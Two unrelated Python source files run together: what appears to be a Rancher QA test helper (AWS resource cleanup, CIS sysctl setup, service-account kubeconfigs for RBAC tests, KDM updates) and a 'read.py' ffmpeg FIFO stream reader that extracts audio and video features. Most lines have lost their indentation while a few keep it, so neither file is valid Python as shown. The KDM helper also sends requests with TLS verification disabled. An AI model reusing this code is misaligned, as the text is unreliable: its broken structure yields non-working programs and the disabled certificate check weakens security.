res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
    # wait for the workloads under the System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
namespace = ["default", "kube-system"]
for ns in namespace:
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
This method generates test cases from an input file and return the result
that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
    This method runs the given kubectl command with the service account's
    kubeconfig and checks whether the result matches the expected
    authorization for the bound cluster role
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
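# Illustrative sketch (not part of the original suite): how the two helpers
# above are typically wired into a parametrized pytest case. The JSON path is
# a made-up placeholder; this is kept as a comment because evaluating
# rbac_test_file_reader() at import time would create service accounts.
# @pytest.mark.parametrize("cluster_role,command,authorization,name",
#                          rbac_test_file_reader(
#                              DATA_SUBDIR + "/rbac_v2_checks.json"))
# def test_rbac_v2(cluster_role, command, authorization, name):
#     validate_cluster_role_rbac(cluster_role, command, authorization, name)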
def wait_until_app_v2_deployed(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
List all installed apps and check for the state of "app_name" to see
if it == "deployed"
:param client: cluster client for the user
:param app_name: app which is being installed
:param timeout: time for the app to come to Deployed state
:return:
"""
    start = time.time()
    app_resp = client.list_catalog_cattle_io_app()
    while True:
        app_list = []
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to Deployed")
        time.sleep(.5)
        for app in app_resp["data"]:
            app_list.append(app["metadata"]["name"])
            if app["metadata"]["name"] == app_name:
                if app["status"]["summary"]["state"] == "deployed":
                    return app_list
        app_resp = client.list_catalog_cattle_io_app()
def wait_until_app_v2_uninstall(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
    List all installed apps and search for "app_name" in the list;
    if app_name is NOT in the list, the app has been uninstalled successfully
    :param client: cluster client for the user
    :param app_name: app which is being uninstalled
:param timeout: time for app to be uninstalled
"""
    start = time.time()
    app_resp = client.list_catalog_cattle_io_app()
    while True:
        app_list = []
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to Uninstalled")
        time.sleep(.5)
        for app in app_resp["data"]:
            app_list.append(app["metadata"]["name"])
        if app_name not in app_list:
            return app_list
        app_resp = client.list_catalog_cattle_io_app()
def check_v2_app_and_uninstall(client, chart_name):
    app_resp = client.list_catalog_cattle_io_app()
    for app in app_resp["data"]:
        if app["metadata"]["name"] == chart_name:
            client.action(obj=app, action_name="uninstall")
            app_list = wait_until_app_v2_uninstall(client, chart_name)
            assert chart_name not in app_list, \
                "App has not uninstalled"
def update_and_validate_kdm(kdm_url, admin_token=ADMIN_TOKEN,
rancher_api_url=CATTLE_API_URL):
print("Updating KDM to use {}".format(kdm_url))
header = {'Authorization': 'Bearer ' + admin_token}
api_url = rancher_api_url + "/settings/rke-metadata-config"
kdm_json = {
"name": "rke-metadata-config",
"value": json.dumps({
"refresh-interval-minutes": "1440",
"url": kdm_url
})
}
r = requests.put(api_url, verify=False, headers=header, json=kdm_json)
r_content = json.loads(r.content)
assert r.ok
assert r_content['name'] == kdm_json['name']
assert r_content['value'] == kdm_json['value']
time.sleep(2)
# Refresh Kubernetes Metadata
kdm_refresh_url = rancher_api_url + "/kontainerdrivers?action=refresh"
response = requests.post(kdm_refresh_url, verify=False, headers=header)
assert response.ok
|
read.py
|
#!/usr/bin/python3
# coding: utf-8
import os, sys, stat
import random
import threading
import multiprocessing
import subprocess
import streams.transcribe
import queue
import select
import time, datetime
from fcntl import fcntl, F_GETFL, F_SETFL, ioctl
import cv2
import numpy as np
import re
import setproctitle
from streams.detectors import shot
# TODO:
# structure this more intelligently
def new_frame(frame_num=0):
frame = {}
frame['frame'] = frame_num
# TODO: initialize this properly
frame['frametime'] = ''
# TODO: initialize these properly
#frame['small'] = bytes()
#frame['gray'] = bytes()
#frame['rframe'] = bytes()
# dictates what kind of shot boundary detected
frame['shot_type'] = ''
# edge contours, good for rough estimations
frame['edges'] = []
# proprietary metric
frame['gray_motion_mean'] = 0
# another video break metric
frame['mse'] = 0
# shot break detection score
frame['sbd'] = 0.0
# hulls from motion
frame['motion_hulls'] = []
frame['viewport'] = None
# last shot detected, could be itself
frame['shot_detect'] = 0
# last motion frame detected, could be itself
frame['motion_detect'] = 0
# last audio break detected, could be itself
frame['audio_detect'] = 0
# last scene break detected, could be itself
frame['scene_detect'] = 0
# type of audio detected
frame['audio_type'] = ''
# how long has this frame been breaking?
frame['break_count'] = 0
# zeros in the audio frame - a measure of artificial silence
frame['zeros'] = 0
frame['zcr'] = 0
frame['zcrr'] = 0
frame['ste'] = 0
frame['ster'] = 0
# is this a super quiet scene or not?
frame['isolation'] = False
frame['raudio_max'] = 100
frame['raudio_mean'] = 100
frame['audio_max'] = 100
frame['audio_mean'] = 100
frame['abd_thresh'] = 0
frame['ster_thresh'] = 0
# how much speech is in the frame
frame['speech_level'] = 0.0
frame['ssd_rects'] = []
frame['human_rects'] = []
frame['face_rects'] = []
frame['vehicle_rects'] = []
frame['object_rects'] = []
frame['contrib_rects'] = []
frame['text_rects'] = []
frame['text_hulls'] = []
frame['com_detect'] = None
return frame
#
# given a segment of audio, determine its energy
# check if that energy is in the human band of
# speech.
#
# warning - this has a defect in it that will crash for long
# segments of audio. Needs to be fixed
#
def speech_calc(self,raw_audio):
if len(raw_audio) < 10:
return 0
data_freq = np.fft.fftfreq(len(raw_audio),1.0/self.sample)
data_freq = data_freq[1:]
data_ampl = np.abs(np.fft.fft(raw_audio))
data_ampl = data_ampl[1:]
data_energy = data_ampl ** 2
energy_freq = {}
for (i, freq) in enumerate(data_freq):
if abs(freq) not in energy_freq:
energy_freq[abs(freq)] = data_energy[i] * 2
sum_energy = 0
for f in energy_freq.keys():
if 300<f<3000:
sum_energy += energy_freq[f]
if sum_energy < 1:
return 0
return sum_energy / sum(energy_freq.values())
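#
# Hedged usage sketch for speech_calc(), not part of the original pipeline:
# a 1 kHz tone keeps essentially all of its energy inside the 300-3000 Hz
# speech band, so the returned ratio should be close to 1.0. _SpeechCalcDemo
# exists only to satisfy the `self.sample` lookup; the 16 kHz sample rate and
# the SPEECH_CALC_DEMO guard are assumptions for this example.
#
if __name__ == '__main__' and os.environ.get('SPEECH_CALC_DEMO'):
    class _SpeechCalcDemo:
        sample = 16000
    _t = np.arange(0, 0.5, 1.0 / _SpeechCalcDemo.sample)
    _tone = (np.sin(2 * np.pi * 1000 * _t) * 32767).astype(np.int16)
    print('speech ratio for a 1 kHz tone:', speech_calc(_SpeechCalcDemo(), _tone))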
#
# This is the main thread that processes ffmpeg,
# and muxes everything together out of the fifos
#
class FileVideoStream:
def process(self):
if self.image:
return
#
# self.pipe is the pipe from the ffmpeg subprocess
# self.video_fifo is the video channel from the ffmpeg proces
# self.audio_fifo is the audio channel from the ffmpeg proces
# self.caption_fifo is the caption channel from the ffmpeg proces
# captions are pulled from a filter as they are embedded in the
# video meta data and otherwise lost on the transcode
#
if self.pipe is not None:
self.pipe.terminate()
if self.video_fifo is not None:
os.close(self.video_fifo)
        if self.audio_fifo is not None:
            os.close(self.audio_fifo)
        if self.caption_fifo is not None:
            os.close(self.caption_fifo)
if os.path.lexists('/tmp/%s_video' % self.name):
os.unlink('/tmp/%s_video' % self.name)
if os.path.lexists('/tmp/%s_audio' % self.name):
os.unlink('/tmp/%s_audio' % self.name)
if os.path.lexists('/tmp/%s_caption' % self.name):
os.unlink('/tmp/%s_caption' % self.name)
os.mkfifo('/tmp/%s_video' % self.name)
os.mkfifo('/tmp/%s_audio' % self.name)
os.mkfifo('/tmp/%s_caption' % self.name)
video_command = []
#
# big assumption: http stream is an MPEGTS and probably a TV source
# TODO: ffmpeg command passthrough. enable / disable logging
#
if self.stream[:4] != 'rtsp':
# probably should do this better
self.stream = str.replace(self.stream,':','\\\:')
self.stream = str.replace(self.stream,'@','\\\@')
video_command = [ '-hide_banner','-loglevel','panic','-hwaccel','vdpau','-y','-f','lavfi','-i','movie=%s:s=0\\\:v+1\\\:a[out0+subcc][out1]' % self.stream,'-map','0:v','-vf','bwdif=0:-1:1,scale=%d:%d:force_original_aspect_ratio=decrease,pad=%d:%d:(ow-iw)/2:(oh-ih)/2' % (self.width,self.height,self.width,self.height),'-pix_fmt','bgr24','-r','%f' % self.fps,'-s','%dx%d' % (self.width,self.height),'-vcodec','rawvideo','-f','rawvideo','/tmp/%s_video' % self.name, '-map','0:a','-acodec','pcm_s16le','-ac','1','-ar','%d' % self.sample,'-f','wav','/tmp/%s_audio' % self.name, '-map','0:s','-f','srt','/tmp/%s_caption' % self.name ]
if self.seek:
video_command[:0] = ['-ss',self.seek]
video_command[:0] = ['ffmpeg']
print('ffmpeg cmd',' '.join(video_command))
self.pipe = subprocess.Popen(video_command)
print('Step 2 initializing video /tmp/%s_video' % self.name)
self.video_fifo = os.open('/tmp/%s_video' % self.name,os.O_RDONLY | os.O_NONBLOCK,self.width*self.height*3*10)
#
            # WARNING: your fifo pipe has to be large enough to hold a bunch of video frames. By default it's only 1MB, which is
            # not very much data. I increased mine to hold 10 frames of 1080 rawvideo
#
# sudo sysctl fs.pipe-max-size=6220800
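            # Assumption: the magic constant 1031 used below is F_SETPIPE_SZ on Linux
            # (1024 + 7, not exported by older Python fcntl modules), i.e. the call asks
            # the kernel to grow this fifo's buffer to 6220800 bytes.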
fcntl(self.video_fifo,1031,6220800)
#
# puny linux default
#fcntl(self.video_fifo,1031,1048576)
print('Step 3 initializing audio /tmp/%s_audio' % self.name)
self.audio_fifo = os.open('/tmp/%s_audio' % self.name,os.O_RDONLY | os.O_NONBLOCK,self.sample*2*10)
#fcntl(self.audio_fifo,1031,1048576)
fcntl(self.audio_fifo,1031,6220800)
# TODO: move this to os.open()
self.caption_fifo = os.open('/tmp/%s_caption' % self.name,os.O_RDONLY | os.O_NONBLOCK,4096)
#
# big assumption rtsp stream is h264 of some kind and probably a security camera
            # it does not handle audio, as the audio is not actually in the stream. Presumably we could mux it here if it exists
elif self.stream[:4] == 'rtsp':
            # we don't need the lavfi command because there are no subs. also, the movie= container for rtsp doesn't let me pass rtsp_transport, which will result in
            # dropped packets if I do not force TCP transport
# also, vdpau is not working for some reason (yuv issues)
#
video_command = [ 'ffmpeg','-nostdin','-re','-hide_banner','-loglevel','panic','-y','-r','%f' % self.fps,'-rtsp_transport','tcp','-i',self.stream,'-map','0:v','-vf','scale=%d:%d:force_original_aspect_ratio=decrease,pad=%d:%d:(ow-iw)/2:(oh-ih)/2' % (self.width,self.height,self.width,self.height),'-pix_fmt','bgr24','-r','%f' % self.fps,'-vcodec','rawvideo','-f','rawvideo','/tmp/%s_video' % self.name ]
self.pipe = subprocess.Popen(video_command)
print('fifo: /tmp/%s_video' %self.name)
self.video_fifo = os.open('/tmp/%s_video' % self.name,os.O_RDONLY | os.O_NONBLOCK,self.width*self.height*3*10)
else:
print("unrecognized input")
return
self.audio_poll = None
self.video_poll = None
self.caption_poll = None
if self.caption_fifo:
self.caption_poll = select.poll()
self.caption_poll.register(self.caption_fifo,select.POLLIN)
if self.video_fifo:
self.video_poll = select.poll()
self.video_poll.register(self.video_fifo,select.POLLIN)
if self.audio_fifo:
self.audio_poll = select.poll()
self.audio_poll.register(self.audio_fifo,select.POLLIN)
print('ffmpeg pid:',self.pipe.pid)
#
# This is the queue that holds everything together
#
def __init__(self, source, queueSize=2048):
self.streams = []
# TODO: if source has ;##:##:## then seek start time to there
self.seek = None
if source[-9] == ';':
self.seek = source[-8:]
source = source[0:-9]
self.stream = source
self.image = False
if self.stream.endswith('.jpg') or self.stream.endswith('.png'):
self.image = True
self.name = 'input_%d_%d' % (os.getpid(),random.choice(range(1,1000)))
self.display = False
if os.environ.get('DISPLAY'):
self.display = True
self.caption_guide = {}
self.filename = None
self.state = None
self.pipe = None
#self.transcribe = None
self.video_fifo = None
self.audio_fifo = None
self.caption_fifo = None
self.age = 0
self.filepos = 0
self.clockbase = 0
self.microclockbase = 0
self.stopped = multiprocessing.Value('i',0)
self.ff = False
# disabled for now.
self.tas = None
#self.tas = TranscribeAudioStream().load()
# initialize the analyzer pipe
self.Q = multiprocessing.Queue(maxsize=queueSize)
def __del__(self):
        if self.pipe:
            # not cleanly exiting the threads leads to all kinds of problems, including deadlocks
            self.pipe.terminate()
            try:
                self.pipe.communicate(timeout=15)
            except subprocess.TimeoutExpired:
                self.pipe.kill()
                self.pipe.communicate()
if self.video_fifo:
os.close(self.video_fifo)
if self.audio_fifo:
os.close(self.audio_fifo)
        if self.caption_fifo:
            os.close(self.caption_fifo)
# I need to figure out how to get it to reset the console too
if os.path.lexists('/tmp/%s_video' % self.name):
os.unlink('/tmp/%s_video' % self.name)
if os.path.lexists('/tmp/%s_audio' % self.name):
os.unlink('/tmp/%s_audio' % self.name)
if os.path.lexists('/tmp/%s_caption' % self.name):
os.unlink('/tmp/%s_caption' % self.name)
def load(self,width,height,fps,sample,scale=0.2):
setproctitle.setproctitle('v2d main')
self.scale = scale
self.width = width
self.height = height
self.fps = fps
self.sample = sample
self.t = multiprocessing.Process(target=self.update, args=())
self.t.daemon = True
self.t.start()
return self
    # this is the demuxer. it puts the video frames into
    # a queue. the captions go into a never-ending hash (never gets pruned)
    # and the audio goes into a never-ending buffer in memory
def update(self):
print("process!",self.stopped.value)
setproctitle.setproctitle('v2d reader')
self.process()
timeout = 0
read_frame = 0
start_talking = 0
no_talking = 0
data_buf = []
last_buf = None
last_scene = 0
rolling_ste = []
last_rms = 100
play_audio = None
raw_audio = bytes()
raw_image = bytes()
# TODO: get this into utils/var
data = new_frame(read_frame)
data['fps'] = self.fps
while self.stopped.value == 0:
bstart = time.time()
# TODO: replace with qmax for both
if self.Q.qsize() == 1023:
print('running fast, sleeping')
if self.Q.qsize() >= 100:
time.sleep(0.01)
if self.Q.qsize() >= self.fps*3:
time.sleep(0.1)
continue
if self.audio_poll is None and self.video_poll is None and self.image is False:
break
###### captions
            # 4096 was kind of chosen at random. It's a nonblocking read
if read_frame % self.fps == 0 and self.caption_fifo and self.caption_poll is not None:
# doesn't really need to do this on every frame
events = self.caption_poll.poll(1)
if len(events) > 0 and events[0][1] & select.POLLIN:
raw_subs = os.read(self.caption_fifo,4096)
if raw_subs and len(raw_subs) > 0:
data['caption_time'],data['caption'] = self.parse_caption(raw_subs)
###### audio
# audio is read in, a little bit at a time
if self.audio_fifo and self.audio_poll is not None and data.get('audio') is None:
fail = 0
bufsize = int((self.sample*2/self.fps) - len(raw_audio))
events = self.audio_poll.poll(1)
#print('audio events',events)
if len(events) > 0 and not events[0][1] & select.POLLIN:
self.audio_poll.unregister(self.audio_fifo)
self.audio_poll = None
os.close(self.audio_fifo)
self.audio_fifo = None
print('warning audio error',events[0][1])
continue
while bufsize > 0 and len(events) > 0 and events[0][1] & select.POLLIN:
tmp = os.read(self.audio_fifo,bufsize)
events = self.audio_poll.poll(1)
if tmp is not None:
raw_audio += tmp
bufsize = int((2 * self.sample / self.fps) - len(raw_audio))
if bufsize < 0:
print('warning, negative buf',bufsize)
else:
fail += 1
print("warning audio underrun0",len(raw_audio))
time.sleep(0.001)
if fail > 5:
print("warning audio underrun1",len(raw_audio))
break
if raw_audio is not None and len(raw_audio) == int(self.sample*2/self.fps):
data['audio'] = raw_audio
raw_audio = bytes()
if data is not None and data.get('audio') is not None and data.get('audio_np') is None:
data['audio_np'] = np.fromstring(data['audio'],np.int16)
if play_audio is None:
play_audio = data['audio_np'].copy()
else:
play_audio = np.concatenate((play_audio,data['audio_np']),axis=0)
if(len(play_audio) > self.sample):
play_audio = play_audio[int(self.sample / self.fps):]
# speed up fft by taking a sample
mags2 = np.fft.rfft(abs(play_audio[0::100]))
mags = np.abs(mags2)
amax = max(mags)
amin = min(mags)
variance = np.var(mags)
data['last_abd'] = (amax + amin) / variance
data['last_audio'] = play_audio
data['last_audio_level'] = np.std(abs(play_audio),axis=0)
data['last_audio_power'] = np.sum(abs(play_audio)) / self.sample
local_max2 = np.max(play_audio)
local_max = np.max(play_audio**2)
local_mean = np.mean(play_audio**2)
#print('max',local_max2,local_mean)
# TODO: fix issues with negative sqrts
data['last_rms'] = np.sqrt(local_mean)
data['last_audio_max'] = abs(play_audio).max(axis=0)
data['last_audio_mean'] = abs(play_audio).mean(axis=0)
last = data['last_audio'][0::1000]
# WARNING: compute intensive
data['last_ste'] = sum( [ abs(x)**2 for x in last ] ) / len(last)
#print('last_',data['frame'],data['last_ste'])
#print('last_',data['last_audio_mean'],play_audio_mean,delta)
# TODO: misnamed
data['audio_level'] = np.std(abs(data['audio_np']),axis=0)
data['audio_power'] = np.sum(abs(data['audio_np'])) / self.sample
local_mean = np.mean(data['audio_np']**2)
# TODO: fix issues with negative sqrts
if data['audio_level'] > 0 and local_mean > 0:
data['rms'] = np.sqrt(local_mean)
data['audio_max'] = abs(data['audio_np']).max(axis=0)
data['audio_mean'] = abs(data['audio_np']).mean(axis=0)
# WARNING: compute intensive
                    data['ste'] = sum( [ abs(x)**2 for x in data['audio_np'][0::100] ] ) / len(data['audio_np'][0::100])
mags2 = np.fft.rfft(abs(data['audio_np']))
mags = np.abs(mags2)
amax = max(mags)
amin = min(mags)
variance = np.var(mags)
data['abd'] = (amax + amin) / (variance + 0.0001)
signs = np.sign(data['audio_np'])
signs[signs == 0] = -1
                    data['zcr'] = len(np.where(np.diff(signs))[0])/(len(data['audio_np']) + 0.0001)
signs = np.sign(data['last_audio'])
signs[signs == 0] = -1
                    data['last_zcr'] = len(np.where(np.diff(signs))[0])/(len(data['last_audio']) + 0.0001)
data['ster'] = data['last_ste'] / (data['ste'] + 0.0001)
# it might make sense to reset this on scene breaks
rolling_ste.append(data['ster'])
if len(rolling_ste) > self.fps * 10:
rolling_ste.pop(0)
data['mean_ste'] = np.mean(rolling_ste)
data['pwrr'] = data['audio_power'] / (data['last_audio_power'] + 0.0001)
data['zcrr'] = data['last_zcr'] / (data['zcr'] + 0.0001)
# calculate longest continous zero chain
longest = 0
last = 0
for i,e in enumerate(data['audio_np']):
if e == 0:
longest += 1
if longest > last:
last = longest
else:
longest = 0
data['zeros'] = last
data['speech_level'] = speech_calc(self,data['audio_np'])
#print('last audio',read_frame)
if data['speech_level'] > 0.8:
#print("Talking!",data['speech_level'],read_frame)
start_talking = read_frame
no_talking = 0
else:
no_talking += 1
if (no_talking == 10 and len(play_audio) > int(2*self.sample)):
#print(" Transcribing:",len(play_audio),read_frame,read_frame - start_talking)
if self.tas and self.tas.transcribe:
self.tas.transcribe.stdin.write(play_audio)
start_talking = 0
###### video
if self.image:
data['raw'] = cv2.resize(cv2.imread(self.stream),(self.width,self.height))
elif self.video_fifo and self.video_poll is not None and data.get('raw') is None:
fail = 0
bufsize = self.width*self.height*3 - len(raw_image)
events = self.video_poll.poll(1)
if len(events) > 0 and not events[0][1] & select.POLLIN:
self.video_poll.unregister(self.video_fifo)
self.video_poll = None
os.close(self.video_fifo)
self.video_fifo = None
print('warning video error',events[0][1])
continue
while bufsize > 0 and len(events) > 0 and events[0][1] & select.POLLIN:
tmp = os.read(self.video_fifo,bufsize)
events = self.video_poll.poll(1)
if tmp is not None:
raw_image += tmp
bufsize = self.width*self.height*3 - len(raw_image)
else:
fail += 1
print("warning video underrun0",len(raw_image))
time.sleep(0.001)
if fail > 5:
print("warning video underrun1",len(raw_image))
break
if raw_image is not None and len(raw_image) == self.width*self.height*3:
data['raw'] = np.fromstring(raw_image,dtype='uint8').reshape((self.height,self.width,3))
raw_image = bytes()
if data is not None and data.get('raw') is not None and data.get('rframe') is None:
# crop out letter and pillarbox
# don't do this if we get a null - its a scene break
# TODO: don't do this unless the height and width is changing by a lot
data['small'] = cv2.resize(data['raw'],(int(data['raw'].shape[:2][1] * self.scale),int(data['raw'].shape[:2][0] * self.scale)))
data['tiny'] = cv2.resize(data['raw'],(8,8))
#non_empty_columns = np.int0(np.where(data['small'].max(axis=0) > 0)[0] / self.scale)
# TODO: instead of resizing this, mark a flag
#if len(non_empty_columns) > 100 and min(non_empty_columns) > self.height * 0.05 and max(non_empty_columns) < self.height * 0.95:
# data['rframe'] = data['raw'][0:self.height,min(non_empty_columns):max(non_empty_columns)+1:]
# data['small'] = cv2.resize(data['rframe'],(int(data['rframe'].shape[:2][1] * self.scale),int(data['rframe'].shape[:2][0] * self.scale)))
#else:
data['rframe'] = data['raw']
data['height'], data['width'], data['channels'] = data['rframe'].shape
data['scale'] = self.scale
data['gray'] = cv2.cvtColor(data['small'],cv2.COLOR_BGR2GRAY)
data['hsv'] = cv2.cvtColor(data['small'],cv2.COLOR_BGR2HSV)
data['lum'] = np.sum(data['hsv']) / float(data['hsv'].shape[0] * data['hsv'].shape[1] * data['hsv'].shape[2])
data['frame_mean'] = np.sum(data['small']) / float(data['small'].shape[0] * data['small'].shape[1] * data['small'].shape[2])
data['hist'] = cv2.calcHist([data['small']], [0, 1, 2], None, [8, 8, 8],[0, 256, 0, 256, 0, 256])
data['hist'] = cv2.normalize(data['hist'],5).flatten()
hist = data['hist']
hist = hist.ravel()/hist.sum()
logs = np.log2(hist+0.00001)
data['contrast'] = -1 * (hist*logs).sum()
#print('last video',read_frame)
data['original'] = data['rframe'].copy()
data['show'] = data['rframe'].copy()
###### transcription
if self.tas and self.tas.transcribe and self.tas.transcribe.stdout:
frame_transcribe = self.tas.transcribe.stdout.read(4096)
if frame_transcribe is not None:
data['transcribe'] = frame_transcribe.decode('ascii')
print(" Transcribe:",len(play_audio),frame_transcribe)
# drop frames if necessary, only if URL
if self.audio_fifo and self.video_fifo:
if data.get('audio_np') is not None and data.get('rframe') is not None:
self.microclockbase += 1 / self.fps
# instead of directly playing the video, buffer it a little
# buffer this for 30 frames and send them all at the same time
# this way we can stitch the audio together
window = self.fps
# TODO: don't do this in the middle of a break, cycle around and do it again
# this prevents the buffer from cutting in the middle of a break cluster
# NOTE: defect might be on the other side -- i.e., the :2 cuts the break in half
if read_frame % (2*window) == 0 and read_frame > 0 and data['shot_detect'] > data['frame'] - 5:
print('WARNING UPCOMING SPLIT SCENE, PLEASE FIX')
if read_frame % (2*window) == 0 and read_frame > 0:
cast_audio = bytes()
for buf in data_buf[0:2*window]:
cast_audio += buf['audio']
data_buf[0]['play_audio'] = cast_audio
# TODO: if no audio, pad with zero bytes
# this is basically a NMS algorithm. Find all the upcoming breaks
# and take the strongest one
new_buf = []
breaks = []
scenes = []
data_buf.append(data)
for buf in data_buf:
if last_buf is not None and buf['sbd'] == 0.0:
buf = shot.frame_to_contours(buf,last_buf)
buf = shot.frame_to_shots(buf,last_buf)
if buf['scene_detect'] == buf['frame']:
scenes.append((buf['shot_detect'],buf['sbd']))
if buf['shot_detect'] == buf['frame']:
breaks.append((buf['frame'],buf['sbd']))
last_buf = buf
new_buf.append(buf)
real_break = new_buf[0]['shot_detect']
# pick the oldest frame in a tie
if len(scenes) > 0:
scenes.sort(key=lambda x: x[0],reverse=True)
scenes.sort(key=lambda x: x[1],reverse=True)
#print(data['frame'],'upcoming scenes',scenes)
# TODO: include the cluster in the frame packet for logging
real_break = scenes[0][0]
last_scene = real_break
rolling_ste = []
play_audio = None
elif len(breaks) > 0:
breaks.sort(key=lambda x: x[0],reverse=True)
breaks.sort(key=lambda x: x[1],reverse=True)
#print('upcoming breaks',breaks)
real_break = breaks[0][0]
for buf in new_buf[0:2*window]:
# set this frame as the real scene for the block
if buf['scene_detect'] != last_scene:
buf['scene_detect'] = last_scene
# set this frame as the real shot for the block
buf['shot_detect'] = real_break
self.Q.put_nowait(buf)
data_buf = new_buf[2*window:]
else:
data_buf.append(data)
read_frame += 1
data = new_frame(read_frame)
data['last_scene'] = last_scene
elif self.video_fifo or self.image:
if data.get('rframe') is not None:
self.microclockbase += 1 / self.fps
self.Q.put_nowait(data)
read_frame += 1
data = new_frame(read_frame)
data['fps'] = self.fps
data['sample'] = self.sample
time.sleep(0.0001)
if self.video_fifo:
os.close(self.video_fifo)
if self.audio_fifo:
os.close(self.audio_fifo)
def read(self):
return self.Q.get()
def stop(self):
print('stop!')
self.stopped.value = 1
for i in range(self.Q.qsize()):
self.Q.get()
self.Q = None
#
# Turn the output from the lavfi filter into a dict with timestamps
# TODO: move this wherever it goes
#
def parse_caption(self,line):
clean = line.rstrip().decode('ascii', errors='ignore')
cleanr = re.compile('<.*?>')
clean = re.sub(cleanr,'',clean)
        cleanr = re.compile(r'\{.an\d\}')
clean = re.sub(cleanr,' ',clean)
last_caption = ''
for line in clean.splitlines():
            mo = re.search(r"^(\d\d:\d\d:\d\d),\d+? --> (\d\d:\d\d:\d\d),\d+", line)
if mo and mo.group():
last_caption = datetime.datetime.strftime(datetime.datetime.strptime(mo.group(1),"%H:%M:%S") + datetime.timedelta(seconds=self.clockbase),'%H:%M:%S')
self.caption_guide[last_caption] = {}
# add this to the internal frame clock
self.caption_guide[last_caption]['start'] = last_caption
